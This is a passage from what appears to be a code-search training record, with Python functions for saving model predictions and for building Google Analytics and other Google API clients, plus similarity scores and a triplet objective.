"def save_predictions(gtfilename, loss_type, probs, preds, outfile):\n\n # 1. get file ids\n liste_fileids = []\n targets = []\n passFirstLine=True\n with open(gtfilename, 'r') as fh:\n for line in fh:\n if passFirstLine:\n passFirstLine = False\n continue\n tmp = line.rstrip().split(',')\n liste_fileids.append(tmp[0])\n targets.append(tmp[1])\n\n print 'liste_fileids', len(liste_fileids)\n # 2. save preds\n import csv\n with open(outfile, 'w') as csvfile:\n # fieldnames = ['itemid', 'hasbird', 'pred', 'gt']\n fieldnames = ['itemid', 'hasbird']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writeheader()\n if loss_type == 'categorical_crossentropy':\n for i, id in enumerate(liste_fileids):\n # writer.writerow({'itemid': id, 'hasbird': probs[i, 1], 'pred': preds[i], 'gt': targets[i]})\n writer.writerow({'itemid': id, 'hasbird': probs[i, 1]})\n elif loss_type == 'binary_hinge' or loss_type == 'binary_crossentropy' or loss_type == 'weighted_binary_crossentropy':\n for i, id in enumerate(liste_fileids):\n # writer.writerow({'itemid': id, 'hasbird': probs[i][0], 'pred': preds[i], 'gt': targets[i]})\n writer.writerow({'itemid': id, 'hasbird': probs[i][0]})\n\n print \"INFO: predictions (positive class probas) saved to file:\", outfile",
"def write(self, predictions, filename):\n assert predictions.ndim == 2 or predictions.ndim == 3\n\n driver = self.dataset.GetDriver()\n\n if predictions.ndim == 2:\n dst_ds = driver.CreateCopy(filename, self.dataset)\n # Overwrite the raster band with the predicted labels\n band = dst_ds.GetRasterBand(1)\n band.WriteArray(predictions)\n else:\n for t in range(predictions.shape[0]):\n dst_filename = filename.replace('.tif', '_{}.tif'.format(t))\n dst_ds = driver.CreateCopy(dst_filename, self.dataset)\n\n # Overwrite the raster band with the predicted labels\n band = dst_ds.GetRasterBand(1)\n band.WriteArray(predictions[t])",
"def write_predictions(self, predictions, evaluations=None, data=None, p_out=None, d_out=None):\n\n if not d_out:\n d_out = os.path.split(data.p_data)[0]\n elif not os.path.isdir(d_out):\n os.makedirs(d_out)\n if self.verbose:\n print('\\nCreated folder: %s ' % d_out)\n\n d_out += '/' if not d_out.endswith('/') else ''\n\n timestamp = datetime.now()\n if not p_out:\n tmp = data.p_data.replace(\n '.tsv', '-metaboloc-%s-%s.tsv' % (timestamp.strftime('%Y%m%d%H%M%S'),\n ''.join(np.random.choice(list('abcdef123456'), 6))))\n p_out = d_out + os.path.split(tmp)[1]\n\n labels = np.array(data.labels)\n\n # compile predictions\n yopts = ['' for _ in range(len(data.nodes))]\n\n # compile baseline\n ybls = ['' for _ in range(len(data.nodes))]\n\n for idx, yopt, ybl in zip(predictions['nidxs'], predictions['yopt'], predictions['ybl']):\n yopts[idx] = '/'.join(labels[np.array(self._round(yopt), dtype=bool)])\n ybls[idx] = '/'.join(labels[np.array(self._round(ybl), dtype=bool)])\n\n # compile known\n if evaluations:\n for idx, yopt, ytruth, ybl in zip(evaluations['nidxs'], evaluations['yopt'], evaluations['ytruth'],\n predictions['ybl']):\n yopt_bool = np.array(self._round(yopt), dtype=bool)\n truth_bool = np.array(ytruth, dtype=bool)\n yopts[idx] = '/'.join(labels[yopt_bool | truth_bool])\n ybls[idx] = '/'.join(labels[np.array(self._round(ybl), dtype=bool)])\n\n # Add truth and predictions to dataframe\n df = data.df.assign(predictions=yopts)\n\n # Add baseline to dataframe\n df = df.assign(baseline=ybls)\n\n # Write predictions\n df.to_csv(p_out, sep='\\t', index=False)\n\n print('Results written to %s\\n' % p_out)\n\n return p_out",
"def save_predictions(prediction_maps, output_file, dataset_names):\n assert len(prediction_maps) == len(dataset_names), 'Each prediction map has to have a corresponding dataset name'\n logger.info(f'Saving predictions to: {output_file}...')\n\n with h5py.File(output_file, \"w\") as output_h5:\n for prediction_map, dataset_name in zip(prediction_maps, dataset_names):\n logger.info(f\"Creating dataset '{dataset_name}'...\")\n output_h5.create_dataset(dataset_name, data=prediction_map, compression=\"gzip\")",
"def CardiacDiagnosisModelTester(clf, final_test_path, name, scaler, save_dir='./', label_available=False, prediction_csv=None):\n class_names = [MINF, DCM]\n df = load_dataframe(final_test_path, column='GROUP')\n features = list(df.columns[np.r_[START_COL:END_COL]])\n X_df = df[features]\n X_scaled = scaler.transform(X_df) \n y_pred = clf.predict(X_scaled)\n print (\"Writing predictions to file\", name)\n target = open(save_dir+'/'+ name+'predictions_{}.txt'.format(time.strftime(\"%Y%m%d_%H%M%S\")), 'w')\n classes = {MINF:0, DCM:0}\n for pid, pred in zip(df['Name'], y_pred):\n classes[class_names[pred]] +=1\n line = '{} {}'.format(pid, class_names[pred])\n target.write(line)\n target.write(\"\\n\")\n target.close()\n print (classes)\n if label_available:\n y_true,_ = encode_target(df, 'GROUP', heart_disease_label_map)\n accuracy = accuracy_score(y_true['GROUP'], y_pred)\n print(\"Accuracy: %.2f%%\" % (accuracy * 100.0))\n else:\n if prediction_csv:\n pdf = pd.read_csv(test_on_prediction)\n for pid, pred in zip(df['Name'], y_pred):\n #https://www.shanelynn.ie/select-pandas-dataframe-rows-and-columns-using-iloc-loc-and-ix/\n pdf.loc[pdf['Name']== pid, 'GROUP'] = class_names[pred]\n pdf.to_csv(prediction_csv, index=False)\n # Upload file\n with open(os.path.join(os.path.dirname(prediction_csv), 'ACDC_Predictions.txt'),'w') as outfile:\n pdf.to_string(outfile, columns=['Name','GROUP'], index=False, header=False)",
"def write_out_prediction(predictions_file, src_seqs,\n trg_seqs, pred_string, src_feat_bundles,\n trg_feat_bundles, val_id):\n\n output_lines = []\n if trg_seqs[val_id] != pred_string:\n output_lines.append('*ERROR*')\n output_lines.append('SRC: {}'.format(src_seqs[val_id]))\n if src_feat_bundles[val_id]:\n output_lines.append('SFT: {}'.format(src_feat_bundles[val_id]))\n if trg_feat_bundles[val_id]:\n output_lines.append('TFT: {}'.format(trg_feat_bundles[val_id]))\n output_lines.append('TRG: {}'.format(trg_seqs[val_id]))\n output_lines.append('PRD: {}\\n'.format(pred_string))\n predictions_file.write('{}\\n'.format('\\n'.join(output_lines)))",
"def create_submission_file(classifiers, preprocessor, batch_size, classification_threshold=0.2):\r\n x_test_filename = preprocessor.X_test\r\n steps = len(x_test_filename) / batch_size\r\n y_map = preprocessor.y_map\r\n predictions = None\r\n for classifier in classifiers:\r\n test_gen = preprocessor.get_prediction_generator(batch_size)\r\n predictions_tmp = classifier.predict_gen(test_gen, steps)\r\n if predictions is None:\r\n predictions = predictions_tmp\r\n else:\r\n predictions += predictions_tmp\r\n\r\n predictions = predictions / len(classifiers)\r\n logger.info(\"Predictions shape: {}\\nFiles name shape: {}\\n1st predictions entry:\\n{}\".format(predictions.shape,\r\n x_test_filename.shape,\r\n predictions[0]))\r\n\r\n thresholds = [classification_threshold] * len(y_map)\r\n\r\n predicted_labels = classifier.map_predictions(predictions, y_map, thresholds)\r\n\r\n # Finally lets assemble and visualize our prediction for the test dataset\r\n tags_list = [None] * len(predicted_labels)\r\n for i, tags in enumerate(predicted_labels):\r\n tags_list[i] = ' '.join(map(str, tags))\r\n\r\n final_data = [[filename.split(\".\")[0], tags] for filename, tags in zip(x_test_filename, tags_list)]\r\n\r\n final_df = pd.DataFrame(final_data, columns=['image_name', 'tags'])\r\n\r\n # And save it to a submission file\r\n final_df.to_csv('../submission_file.csv', index=False)\r\n classifier.close()\r\n return None",
"def write_model_results(model, input_file, repr, tags, outpath):\n input, input_data = read_input(input_file)\n\n if repr == \"c\":\n x = utils.get_features(input, ixs=3)\n else:\n x = utils.get_features(input, chars=True)\n\n w_batcher = utils.AutoBatcher(x, x, batch_size=1, shuffle=False)\n labels = []\n for inputs, _ in w_batcher.get_batches():\n output = torch.max(model(inputs), 1)[1]\n labels += output.cpu().data.numpy().tolist()\n\n predictions = utils.NEWLINE.join([\"{} {}\".format(input_data[i], tags[labels[i]])\\\n for i in range(len(input_data))])\n with open(outpath, \"w\") as outfile:\n outfile.write(predictions)",
"def save_prediction(predictions, image_file, path):\n\t\n\tsave_file = convert_file_extension_to_txt(image_file)\n\t\n\twith open(os.path.join(path, save_file), 'w') as f:\n\t\tfor prediction in predictions:\n\t\t\tf.write(str(prediction) + \"\\n\")",
"def save_results(output_dir,\n check_file,\n results,\n exp_string,\n identifier,\n shuffle_labels,\n model_options,\n predictor='classify',\n fold_no=None,\n titration_ratio=None):\n\n signal = 'shuffled' if shuffle_labels else 'signal'\n\n if not isinstance(model_options.training_data, str):\n training_data = '.'.join(model_options.training_data)\n else:\n training_data = model_options.training_data\n\n if isinstance(model_options.n_dim, list):\n n_dim = '.'.join(map(str, model_options.n_dim))\n else:\n n_dim = model_options.n_dim\n\n if predictor == 'classify':\n auc_df = pd.concat(results[\n '{}_auc'.format(exp_string)\n ])\n output_file = construct_filename(output_dir,\n 'auc_threshold_metrics',\n '.tsv.gz',\n identifier,\n training_data,\n model_options.model,\n signal,\n s=model_options.seed,\n n=n_dim,\n f=fold_no,\n t=titration_ratio)\n auc_df.to_csv(\n output_file, sep=\"\\t\", index=False, float_format=\"%.5g\"\n )\n\n aupr_df = pd.concat(results[\n '{}_aupr'.format(exp_string)\n ])\n output_file = construct_filename(output_dir,\n 'aupr_threshold_metrics',\n '.tsv.gz',\n identifier,\n training_data,\n model_options.model,\n signal,\n s=model_options.seed,\n n=n_dim,\n f=fold_no,\n t=titration_ratio)\n aupr_df.to_csv(\n output_file, sep=\"\\t\", index=False, float_format=\"%.5g\"\n )\n\n if '{}_coef'.format(exp_string) in results:\n coef_df = pd.concat(results[\n '{}_coef'.format(exp_string)\n ])\n coef_df.to_csv(\n check_file, sep=\"\\t\", index=False, float_format=\"%.5g\"\n )\n\n metrics_df = pd.concat(results[\n '{}_metrics'.format(exp_string)\n ])\n\n if '{}_preds'.format(exp_string) in results:\n preds_df = pd.concat(results[\n '{}_preds'.format(exp_string)\n ])\n else:\n preds_df = None\n\n if '{}_param_grid'.format(exp_string) in results:\n params_df = pd.concat(results[\n '{}_param_grid'.format(exp_string)\n ])\n else:\n params_df = None\n\n output_file = construct_filename(output_dir,\n 'metrics',\n '.tsv.gz',\n identifier,\n training_data,\n model_options.model,\n signal,\n predictor,\n s=model_options.seed,\n n=n_dim,\n f=fold_no,\n t=titration_ratio)\n metrics_df.to_csv(\n output_file, sep=\"\\t\", index=False, float_format=\"%.5g\"\n )\n\n if preds_df is not None:\n output_file = construct_filename(output_dir,\n 'preds',\n '.tsv.gz',\n identifier,\n training_data,\n model_options.model,\n signal,\n predictor,\n s=model_options.seed,\n n=n_dim,\n f=fold_no,\n t=titration_ratio)\n preds_df.to_csv(\n output_file, sep=\"\\t\", float_format=\"%.5g\"\n )\n\n if params_df is not None:\n output_file = construct_filename(output_dir,\n 'param_grid',\n '.tsv.gz',\n identifier,\n training_data,\n model_options.model,\n signal,\n predictor,\n s=model_options.seed,\n n=n_dim,\n f=fold_no)\n\n params_df.to_csv(output_file, sep=\"\\t\")",
"def get_predictions(fitted_model_filename):\n click.echo(\"Mode: predicting probabilities.\\n\")\n defaults = get_defaults()\n\n fitted_model_filename = add_extension(fitted_model_filename)\n fitted_model_path = os.path.join(defaults.OUTPUT.FITTED_MODELS_PATH, fitted_model_filename)\n new_options = [\"OUTPUT.FITTED_MODEL_PATH\", fitted_model_path]\n\n # boot_data = bootstrap(new_options, mode=\"internal_test\")\n # model = boot_data['model']\n #\n # X_test_int, y_test_int = boot_data['data']\n # internal_test_proba = model.predict_proba(X_test_int)\n # internal_test_proba = np.c_[y_test_int, internal_test_proba[:, 1]]\n\n boot_data = bootstrap(new_options, mode=\"external_test\")\n model = boot_data['model']\n X_test_ext, y_test_ext = boot_data['data']\n\n # fit scaler on train data and transform test data\n scaler = StandardScaler()\n X_train, y_train = load_data(defaults, which='train')\n\n numeric_cols = X_train.select_dtypes(include=np.float64).columns.tolist()\n scaler.fit(X_train[numeric_cols])\n X_test_ext.loc[:, numeric_cols] = scaler.transform(X_test_ext[numeric_cols])\n\n external_test_proba = model.predict_proba(X_test_ext)\n external_test_proba = np.c_[y_test_ext, external_test_proba[:, 1]]\n\n # internal_test_results_path = os.path.join(defaults.OUTPUT.PREDS_PATH, \"internal_test_preds.csv\")\n external_test_results_path = os.path.join(defaults.OUTPUT.PREDS_PATH,\n f\"external_test_preds_{fitted_model_filename.replace('.pkl', '')}.csv\")\n # pd.DataFrame(internal_test_proba, columns=['target', 'proba']).to_csv(internal_test_results_path, index=False)\n pd.DataFrame(external_test_proba, columns=['target', 'proba']).to_csv(external_test_results_path, index=False)",
"def write_predictions(estimator, vertical, source_website, target_website):\n score_dir_path = os.path.join(\n FLAGS.result_path, \"{}/{}-results/score\".format(vertical, source_website))\n\n tf.gfile.MakeDirs(score_dir_path)\n pred_filename = os.path.join(\n FLAGS.result_path,\n \"{}/{}-results/score/{}.preds.txt\".format(vertical, source_website,\n target_website))\n node_emb_filename = os.path.join(\n FLAGS.result_path,\n \"{}/{}-results/score/{}.node_emb.npz\".format(vertical, source_website,\n target_website))\n print(\"Writing predictions to file: %s\" % pred_filename, file=sys.stderr)\n golds_gen = model_util.joint_generator_fn(\n get_data_path(\n vertical=vertical, website=target_website, dev=False, goldmine=False),\n get_data_path(\n vertical=vertical, website=target_website, dev=False, goldmine=True),\n vertical,\n mode=\"all\")\n transfer_eval_input_function = functools.partial(\n model_util.joint_input_fn,\n get_data_path(\n vertical=vertical, website=target_website, dev=False, goldmine=False),\n get_data_path(\n vertical=vertical, website=target_website, dev=False, goldmine=True),\n vertical,\n mode=\"all\")\n preds_gen = estimator.predict(transfer_eval_input_function)\n prediction_str = \"\"\n if FLAGS.extract_node_emb:\n node_embs = []\n for gold, pred in zip(golds_gen, preds_gen):\n if FLAGS.circle_features:\n ((nnodes), (_), (words_list, words_len), (_, _), (_, _),\n (partner_words, _), (friend_words, _), (_, _), (_, _),\n (html_path, xpath_list), (_, _), (_, _), (_)), tags = gold\n\n for index in range(nnodes):\n normalized_partner = []\n for w in partner_words[index]:\n normalized_partner.append(normalize_text(w))\n\n if FLAGS.match_keywords:\n normalized_word = [\n normalize_text(w)\n for w in words_list[index][:words_len[index]]\n ]\n candicate_labels = constants.ATTRIBUTES[vertical]\n print(\"Partner: %s, Words: %s, Pred: %s\" %\n (\" \".join(normalized_partner), \" \".join(normalized_word),\n pred[\"tags\"][index]))\n normalized_partner = \" \".join(normalized_partner)\n for i, l in enumerate(candicate_labels):\n l = str(l).lower().replace(\"tor\", \"t\").split(\"_\")\n status = all([x in normalized_partner for x in l])\n if status:\n print(\"OLD:\", pred[\"tags\"][index])\n print(\"NEW:\", candicate_labels[i].encode())\n pred[\"tags\"][index] = candicate_labels[i].encode()\n\n if FLAGS.friend_encoder:\n normalized_friend = []\n for w in friend_words[index]:\n normalized_friend.append(normalize_text(w))\n print(normalized_friend)\n print(pred[\"friends_embs\"][index])\n\n else:\n ((nnodes), (words_list, words_len), (_, _), (_, _), (_, _),\n (html_path, xpath_list), (_, _), (_), (_)), tags = gold\n assert nnodes == len(words_list) == len(tags)\n for index in range(nnodes):\n s = \"\\t\".join([\n str(html_path, \"utf-8\"),\n str(xpath_list[index], \"utf-8\"),\n \" \".join([\n str(w, \"utf-8\") for w in words_list[index][:int(words_len[index])]\n ]),\n str(tags[index], \"utf-8\"),\n str(pred[\"tags\"][index], \"utf-8\"),\n \",\".join([str(score) for score in pred[\"raw_scores\"][index]]),\n ]) + \"\\n\"\n prediction_str += s\n if FLAGS.extract_node_emb:\n node_embs.append([float(i) for i in pred[\"node_embs\"][index]])\n\n with tf.gfile.Open(pred_filename, \"w\") as f:\n f.write(prediction_str)\n\n node_embs = np.array(node_embs)\n # Save np.array to file.\n with tf.gfile.Open(node_emb_filename, \"wb\") as gfo:\n print(\"Writing node emb pickle: %s\" % node_emb_filename, file=sys.stderr)\n pickle.dump(node_embs, gfo)\n print(\"Node Representation Save- done.\", 
file=sys.stderr)",
"def create_identical_truth_and_prediction_file():\r\n # Create an artificial email classification dictionary \r\n class_dict = create_classification()\r\n # Compile the filepaths\r\n truth_filepath = os.path.join(CORPUS_DIR, TRUTH_FILENAME)\r\n pred_filepath = os.path.join(CORPUS_DIR, PREDICTION_FILANAME)\r\n # Save the same dictionary as both the !truth.txt and !prediction.txt\r\n save_classification_to_file(class_dict, truth_filepath)\r\n save_classification_to_file(class_dict, pred_filepath)"
] |
[
"0.7049729",
"0.6968634",
"0.68207085",
"0.6750549",
"0.6720341",
"0.6711167",
"0.6669633",
"0.6594437",
"0.6516126",
"0.6487627",
"0.64480585",
"0.6412054",
"0.6412046",
"0.6412046",
"0.6334649",
"0.63231057",
"0.63150644",
"0.6295352",
"0.6271988",
"0.623328",
"0.6209309",
"0.62061495",
"0.61464554",
"0.6143623",
"0.61383986",
"0.6120063",
"0.6116419",
"0.60757047",
"0.60525215",
"0.6045143"
] |
0.8186171
|
0
|
Build Google Analytics service for the auth profile
|
def get_service(self, auth_profile):
app_root = self.config['app_root_dir']
client_secrets_path = os.path.join(app_root, auth_profile['client_secrets_path'])
token_path = os.path.join(app_root, auth_profile['token_path'])
auth = GoogleAuth(self.auth_flags, client_secrets_path, token_path)
service = auth.build_service('analytics', 'v3')
return service
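# A minimal sketch of the same pattern built directly on google-api-python-client;
# the token file path here is illustrative, and the snippet above relies on its own
# GoogleAuth helper rather than google-auth's Credentials class.
from google.oauth2.credentials import Credentials
from googleapiclient.discovery import build

def build_analytics_service(token_path):
    # Load previously authorized user credentials saved by an earlier OAuth flow.
    creds = Credentials.from_authorized_user_file(token_path)
    # 'analytics' v3 is the Management / Core Reporting API targeted above.
    return build('analytics', 'v3', credentials=creds)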
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def get_Analytics_service():\n #reference: https://developers.google.com/analytics/devguides/reporting/core/v4/\n credentials = get_credentials()\n \n http = httplib2.Http()\n http = credentials.authorize(http)\n service = apiclient.discovery.build('analytics', 'v4', http=http)\n print \"Got Analytics service\"\n\n return service",
"def initialize_analyticsreporting():\n print \"authenticating\"\n credentials = ServiceAccountCredentials.from_p12_keyfile(\n SERVICE_ACCOUNT_EMAIL, KEY_FILE_LOCATION, scopes=SCOPES)\n\n http = credentials.authorize(httplib2.Http())\n\n # Build the service object.\n analytics = build('analytics', 'v4', http=http, discoveryServiceUrl=DISCOVERY_URI)\n\n return analytics",
"def initialize_service():\r\n http = httplib2.Http()\r\n credentials = prepare_credentials()\r\n http = credentials.authorize(http)\r\n return build('analytics', 'v3', http=http)",
"def initialize_analyticsreporting():\n logging.info(\"Initializing Analytics API...\")\n\n credentials = ServiceAccountCredentials.from_json_keyfile_name(\n KEY_FILE_LOCATION, SCOPES)\n\n # Build the service object.\n analytics = build('analyticsreporting', 'v4', credentials=credentials)\n\n return analytics",
"def initialize_analyticsreporting():\n\n # Build the credentials object\n credentials = ServiceAccountCredentials.from_json_keyfile_name(\n KEY_FILE_LOCATION, SCOPES,\n )\n # Build the service object.\n analytics = build('analyticsreporting', 'v4', credentials=credentials)\n return analytics",
"def initialize_analyticsreporting():\n credentials = ServiceAccountCredentials.from_json_keyfile_name(\n KEY_FILE_LOCATION, SCOPES)\n\n # Build the service object.\n analytics = build('analyticsreporting', 'v4', credentials=credentials)\n\n return analytics",
"def initialize_analyticsreporting():\n credentials = ServiceAccountCredentials.from_json_keyfile_name(\n KEY_FILE_LOCATION, SCOPES)\n\n # Build the service object.\n analytics = build('analyticsreporting', 'v4', credentials=credentials)\n\n return analytics",
"def initialize_analyticsreporting():\n credentials = ServiceAccountCredentials.from_json_keyfile_name(\n KEY_FILE_LOCATION, SCOPES)\n\n # Build the service object.\n analytics = build('analyticsreporting', 'v4', credentials=credentials)\n\n return analytics",
"def reportService():\n scopes = os.environ.get('GA_API_SCOPES').split(',')\n name = os.environ.get('GA_API_NAME')\n version = os.environ.get('GA_API_VERSION')\n file_path = os.environ.get('GA_API_CREDS')\n\n credentials = ServiceAccountCredentials.from_json_keyfile_name(\n file_path, \n scopes=scopes\n )\n\n service = build(name, version, credentials=credentials)\n\n return service",
"def create_service_object(credentials):\n http_auth = httplib2.Http()\n http_auth = credentials.authorize(http_auth)\n service = discovery.build('analytics', 'v3', http=http_auth)\n return service",
"def initialize_analyticsreporting():\n # Parse command-line arguments.\n parser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n parents=[tools.argparser])\n flags = parser.parse_args([])\n\n # Set up a Flow object to be used if we need to authenticate.\n flow = client.flow_from_clientsecrets(\n CLIENT_SECRETS_PATH, scope=SCOPES,\n message=tools.message_if_missing(CLIENT_SECRETS_PATH))\n\n # Prepare credentials, and authorize HTTP object with them.\n # If the credentials don't exist or are invalid run through the native client\n # flow. The Storage object will ensure that if successful the good\n # credentials will get written back to a file.\n storage = file.Storage('auth/analyticsreporting.dat')\n credentials = storage.get()\n if credentials is None or credentials.invalid:\n credentials = tools.run_flow(flow, storage, flags)\n http = credentials.authorize(http=httplib2.Http())\n\n # Build the service object.\n analytics = build('analytics', 'v4', http=http, discoveryServiceUrl=DISCOVERY_URI)\n\n return analytics",
"def initialize_analyticsreporting():\n credentials = ServiceAccountCredentials.from_json_keyfile_name(\n KEY_FILE_LOCATION, SCOPES)\n\n # Build the service object.\n ga_conn = build('analyticsreporting', 'v4', credentials=credentials)\n\n return ga_conn",
"def managementService():\n scopes = os.environ.get('GA_API_SCOPES').split(',')\n name = 'analytics'\n version = 'v3'\n file_path = os.environ.get('GA_API_CREDS')\n\n credentials = ServiceAccountCredentials.from_json_keyfile_name(\n file_path, \n scopes=scopes\n )\n\n management_service = build(name, version, credentials=credentials)\n\n return management_service",
"def initialize_analyticsreporting():\n # Parse command-line arguments.\n parser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n parents=[tools.argparser])\n flags = parser.parse_args([])\n\n # Set up a Flow object to be used if we need to authenticate.\n flow = client.flow_from_clientsecrets(\n CLIENT_SECRETS_PATH, scope=SCOPES,\n message=tools.message_if_missing(CLIENT_SECRETS_PATH))\n\n # Prepare credentials, and authorize HTTP object with them.\n # If the credentials don't exist or are invalid run through the native client\n # flow. The Storage object will ensure that if successful the good\n # credentials will get written back to a file.\n storage = file.Storage('analyticsreporting.dat')\n credentials = storage.get()\n if credentials is None or credentials.invalid:\n credentials = tools.run_flow(flow, storage, flags)\n http = credentials.authorize(http=httplib2.Http())\n\n # Build the service object.\n analytics = build('analytics', 'v4', http=http, discoveryServiceUrl=DISCOVERY_URI)\n\n return analytics",
"def initialize_analyticsreporting():\n # Parse command-line arguments.\n parser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n parents=[tools.argparser])\n flags = parser.parse_args([])\n\n # Set up a Flow object to be used if we need to authenticate.\n flow = client.flow_from_clientsecrets(\n CLIENT_SECRETS_PATH, scope=SCOPES,\n message=tools.message_if_missing(CLIENT_SECRETS_PATH))\n\n # Prepare credentials, and authorize HTTP object with them.\n # If the credentials don't exist or are invalid run through the native client\n # flow. The Storage object will ensure that if successful the good\n # credentials will get written back to a file.\n storage = file.Storage('./config/analyticsreporting.dat')\n credentials = storage.get()\n if credentials is None or credentials.invalid:\n credentials = tools.run_flow(flow, storage, flags)\n http = credentials.authorize(http=Http())\n\n # Build the service object.\n analytics = build('analytics', 'v4', http=http, discoveryServiceUrl=DISCOVERY_URI)\n\n return analytics",
"def google_analytics(self) -> Optional[pulumi.Input['ConnectorProfileConnectorProfileConfigConnectorProfileCredentialsGoogleAnalyticsArgs']]:\n return pulumi.get(self, \"google_analytics\")",
"def google_analytics(request):\n return {\n 'GOOGLE_ANALYTICS_KEY': settings.GOOGLE_ANALYTICS_KEY,\n }",
"def google_analytics(request):\n ga_id = None\n\n if get_current_site(request).name == \"Scorecard\":\n ga_id = getattr(settings, \"GOOGLE_ANALYTICS_SCORECARD_ID\", None)\n gtag_id = getattr(settings, \"GOOGLE_GA4_SCORECARD_ID\", None)\n else:\n ga_id = getattr(settings, \"GOOGLE_ANALYTICS_DATA_ID\", None)\n gtag_id = getattr(settings, \"GOOGLE_GA4_DATA_ID\", None)\n\n return {\"GOOGLE_ANALYTICS_ID\": ga_id, \"GOOGLE_GA4_TAG\": gtag_id}",
"def build_service():\n\n\tstore = file.Storage('credentials.json')\n\tcreds = store.get()\n\tif not creds or creds.invalid:\n\t flow = client.flow_from_clientsecrets('client_secret.json', SCOPES)\n\t creds = tools.run_flow(flow, store)\n\tservice = build('gmail', 'v1', http=creds.authorize(Http(disable_ssl_certificate_validation=True)))\n\treturn service",
"def build_service():\r\n creds = None\r\n # The file token.pickle stores the user's access and refresh tokens, and is\r\n # created automatically when the authorization flow completes for the first\r\n # time.\r\n if os.path.exists('token.pickle'):\r\n with open('token.pickle', 'rb') as token:\r\n creds = pickle.load(token)\r\n # If there are no (valid) credentials available, let the user log in.\r\n if not creds or not creds.valid:\r\n if creds and creds.expired and creds.refresh_token:\r\n creds.refresh(Request())\r\n else:\r\n flow = InstalledAppFlow.from_client_secrets_file(\r\n f\"{EMAIL_ACCOUNT_FILE}\", SCOPES)\r\n creds = flow.run_local_server(port=0)\r\n # Save the credentials for the next run\r\n with open('token.pickle', 'wb') as token:\r\n pickle.dump(creds, token)\r\n\r\n service = build('gmail', 'v1', credentials=creds)\r\n return service",
"def __init__(self, account_name=None, property_name=None, profile_name=None, ga_settings=None, logging_obj=None):\n if logging_obj is None:\n log_filename = get_log_filepath('Python App')\n logging_obj = Logging(name=__name__, log_filename=log_filename, log_level_str='INFO')\n self.logging_obj = logging_obj\n config_app_util = ConfigAppUtility()\n if ga_settings is None:\n ga_settings = config_app_util.get_settings_dict('GA')\n self.service_old = init('analytics', 'v3', ga_settings)\n self.service = init('analytics', 'v4', ga_settings)\n self.profile_id = None\n\n if account_name is not None and property_name is not None and profile_name is not None:\n (profile, property, account) = self.get_profile_by_name(account_name, property_name, profile_name)\n profile_id = self.get_profile_id(profile)\n self.set_profile_id(profile_id)\n else:\n log_msg = \"message='The profile ID has not been set. This needs to be set prior to executing any queries.'\"\n self.logging_obj.log(self.logging_obj.WARN, log_msg)",
"def google_analytics(self) -> Optional[pulumi.Input['ConnectorProfileConnectorProfileConfigConnectorProfilePropertiesGoogleAnalyticsArgs']]:\n return pulumi.get(self, \"google_analytics\")",
"def analytics(self):\r\n return Analytics(self.access_token)",
"def runAnalytics():\n #gets OAuth from the API\n analytics = get_Analytics_service()\n #get the object return from the API\n #send that object to print out useful fields\n response = get_report(analytics)\n print_response(response)",
"def save_google_analytics_credentials(self,credentials_dict):\n\t\tprint 'saving credentials'\n\t\t# store information necessary for building client\n\t\tcredentials_dict['token_expiry'] = datetime.now() + timedelta(hours=1)\n\t\tGAUM = GoogleAnalyticsUserModel(credentials_dict)\n\t\tdb.session.add(GAUM)\n\t\tdb.session.commit()\n\t\tdb.session.close()",
"def authorize_api(self):\n\n log.debug('computing Google authentification process for \"{}\"'.format(self.school_year))\n flow = OAuth2WebServerFlow(CLIENT_ID, CLIENT_SECRET, SCOPE)\n storage = Storage('credentials.dat')\n credentials = storage.get()\n\n if credentials is None or credentials.invalid:\n credentials = tools.run_flow(flow, storage, tools.argparser.parse_args())\n\n # Create an httplib2.Http object to handle our HTTP requests, and authorize it\n # using the credentials.authorize() function.\n http = httplib2.Http()\n http = credentials.authorize(http)\n httplib2.debuglevel = 0\n\n return build('calendar', 'v3', http=http)",
"def google_analytics_task(data, user):\n auth = (user.get('livechat_login'), user.get('livechat_api_key'))\n url = 'https://api.livechatinc.com/chats/'+data['chat']['id']+'/'\n headers = {\"X-API-Version\": \"2\"}\n request_data = requests.get(url, headers=headers, auth=auth)\n website = User.query.get(user.get('id')).\\\n websites.filter_by(group=request_data.json()['group'][0])\\\n .first_or_404()\n\n tags = [i.lower() for i in website.tags.split(', ')]\n\n for tag in request_data.json()['tags']:\n if tag.lower() in tags:\n params = urllib.parse.urlencode({\n 'v': 1,\n 'tid': website.google_track_id,\n 'cid': data['chat']['id'],\n 't': 'event',\n 'ec': 'LiveChat',\n 'ea': tag,\n 'el': data['chat']['id']\n })\n connection = http.client.HTTPConnection(\n 'www.google-analytics.com')\n connection.request('POST', '/collect', params)\n return \"\"",
"def google_session(self):\n creds = None\n SCOPES = ['https://www.googleapis.com/auth/admin.reports.audit.readonly']\n\n # The file token.pickle stores the user's access and refresh tokens, and is\n # created automatically when the authorization flow completes for the first\n # time.\n if os.path.exists('token.pickle'):\n with open('token.pickle', 'rb') as token:\n creds = pickle.load(token)\n # If there are no (valid) credentials available, let the user log in.\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n creds.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file(\n self.creds_path, SCOPES)\n creds = flow.run_local_server(port=0)\n # Save the credentials for the next run\n with open('token.pickle', 'wb') as token:\n pickle.dump(creds, token)\n\n service = build('admin', 'reports_v1', credentials=creds)\n\n return service",
"def get_gcal_service(credentials):\n app.logger.debug(\"Entering get_gcal_service\")\n http_auth = credentials.authorize(httplib2.Http())\n service = discovery.build('calendar', 'v3', http=http_auth)\n plusService = discovery.build('plus', 'v1', http=http_auth)\n app.logger.debug(\"Returning service\")\n return [service, plusService]",
